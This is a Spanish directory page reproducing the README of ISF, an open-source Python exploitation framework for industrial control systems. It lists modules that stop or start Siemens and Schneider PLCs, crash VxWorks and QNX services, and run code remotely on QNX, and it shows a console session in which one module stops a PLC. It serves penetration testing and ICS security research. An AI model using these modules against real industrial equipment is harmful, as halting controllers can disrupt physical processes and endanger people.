Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
isf — ISF(Industrial Control System Exploitation Framework),un framework de explotación basado en Python | Kitploit
Herramientas/GitHubGitHub/dark-lbp/isf
Frameworks de Pruebas de PenetraciónFrameworks de ExploitsMapeo de RedesAnálisis de VulnerabilidadesExplotaciónSeguridad SCADA/ICSRecopilación de InformaciónFuzzingDesarrollo de PayloadsArchived
GitHubdark-lbp/isf

isf

1.1k30110hace 2 añosAún no revisado

ISF(Industrial Control System Exploitation Framework),un framework de explotación basado en Python

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Framework de Explotación Industrial

ISF (Industrial Exploitation Framework) es un framework de explotación basado en Python, similar al framework de metasploit.

ISF está basado en el proyecto de código abierto routersploit.

Lee esto en otros idiomas: Inglés, 简体中文,

Aviso legal

El uso de ISF para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún uso indebido o daño causado por este programa.

Clientes de Protocolo ICS

NombreRutaDescripción
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyCliente Modbus-TCP
wdb2_clienticssploit/clients/wdb2_client.pyCliente WdbRPC Versión 2 (Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pyCliente s7comm (PLC S7 300/400)

Módulo de Exploit

NombreRutaDescripción
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyArranque/parada de PLC S7-300/400
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyArranque/parada/reinicio de PLC S7-1200
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyDoS remoto por RPC en Vxworks(CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pyArranque/parada de PLC serie Schneider Quantum 140
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyDoS del servicio TCP Inetd de QNX
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyEjecución remota de código en qconn de QNX
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyConfiguración de IP de dispositivo Profinet DCP

Módulo de Escáner

NombreRutaDescripción
profinet_dcp_scanscanners/profinet_dcp_scan.pyEscáner Profinet DCP
vxworks_6_scanscanners/vxworks_6_scan.pyEscáner Vxworks 6.x
s7comm_scanscanners/s7comm_scan.pyEscáner S7comm
enip_scanscanners/enip_scan.pyEscáner EthernetIP

Módulo de Protocolos ICS (Módulo Scapy)

Estos protocolos se pueden usar en otros frameworks de fuzzing como Kitty o para crear su propio cliente.

NombreRutaDescripción
pn_dcpicssploit/protocols/pn_dcpProtocolo Profinet DCP
modbus_tcpicssploit/protocols/modbus_tcpProtocolo Modbus TCP
wdbrpc2icssploit/protocols/wdbrpc2Protocolo WDB RPC Versión 2
s7commicssploit/protocols/s7comm.pyProtocolo S7comm

Instalación

Requisitos de Python

  • gnureadline (solo OSX)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy Sugerimos instalar scapy manualmente siguiendo este documento oficial

Instalación en Kali

root@kitploit:~
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Uso

root@kitploit:~
    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

Exploits

root@kitploit:~
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

Puede usar la tecla Tab para autocompletar.

Opciones

Mostrar opciones del módulo:

root@kitploit:~
isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

Establecer opciones

root@kitploit:~
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Ejecutar módulo

root@kitploit:~
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Mostrar información del exploit

root@kitploit:~
isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >

Documentos

  • Uso del Cliente Modbus-TCP
  • Uso del Cliente WDBRPCV2
  • Uso del Cliente S7comm
  • Uso de SNMP_bruteforce
  • Uso de fuerza bruta de contraseñas en PLC S7 300/400
  • Uso del Escáner Vxworks 6.x
  • Uso del Escáner Profinet DCP
  • Uso del Escáner de PLC S7comm
  • Uso del módulo de configuración de IP Profinet DCP
  • Cargar módulos desde una carpeta extra
  • Cómo escribir su propio módulo
Descargar herramienta